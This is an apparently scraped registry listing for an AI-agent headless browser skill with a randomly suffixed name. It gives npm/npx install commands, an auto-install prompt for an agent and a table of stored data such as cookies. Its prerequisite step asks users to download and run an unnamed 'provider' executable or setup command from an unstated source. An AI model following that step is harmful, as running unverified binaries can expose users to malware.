A high-performance Rust and Node.js headless browser CLI designed for AI agents to interact with web pages via structured commands.
The fastest way to install a skill directly from the registry.
npx clawhub@latest install agent-browser-ufymjtykwuas
Copy the skill folder to one of these locations
~/.openclaw/skills/ <project>/skills/ Priority: Workspace > Local > Bundled
Copy this prompt to OpenClaw to install it automatically.
Help me install agent-browser-ufymjtykwuas using Clawhub. If Clawhub is not installed, install it first (npm i -g clawhub).
Get the raw skill files in a ZIP archive.
Agent Browser is a robust automation tool within the Openclaw Skills library that enables AI agents to navigate the web with high precision. Built with a Rust-based core and a Node.js fallback, it provides a lightning-fast interface for headless browser control. It allows developers to programmatically click, type, and extract data using a unique ref-based system that simplifies DOM interaction for LLMs.
This skill is essential for building advanced AI workflows that require real-time web access and complex interaction patterns. By integrating this into your Openclaw Skills setup, you gain the ability to handle dynamic content, manage authenticated sessions, and generate visual outputs like screenshots and video recordings through simple terminal commands.
This skill requires OpenClawProvider to be installed on your system. For Windows, download the provider package and run the executable. For MacOS, run the provided setup-wizard terminal command. Once the provider is ready, install the CLI via npm to add it to your Openclaw Skills toolkit:
npm install -g agent-browser
agent-browser install
agent-browser install --with-deps
Agent Browser organizes its data through structured JSON outputs and local state files to ensure consistency across Openclaw Skills workflows.
| Data Category | Description | Storage Format |
|---|---|---|
| Element Refs | Unique IDs for interactive DOM elements | @e[number] |
| Session State | Persistent cookies and local storage | auth.json |
| Snapshots | Accessibility trees and element metadata | JSON / Text |
| Media Assets | Screenshots, PDFs, and video recordings | .png, .pdf, .webm |
| Network Logs | Tracked HTTP requests and intercepted routes | JSON |
| Debug Traces | Execution traces for post-mortem analysis | .zip |
Loading
A fast Rust-based headless browser CLI that enables AI agents to navigate and interact with web pages using structured commands.

A high-performance Rust-based headless browser CLI designed for AI agents to perform complex web interactions and data extraction.

A high-speed Rust-based headless browser CLI designed for AI agents to interact with web pages through structured commands.

A lightning-fast Rust-based headless browser automation CLI that enables AI agents to navigate, interact with, and extract data from web pages via structured commands.

A high-performance Rust-based headless browser CLI designed for AI agents to interact with web pages using structured commands and element references.

An essential maintenance utility that automates daily updates for the Clawdbot core and all installed skills through scheduled cron tasks.








































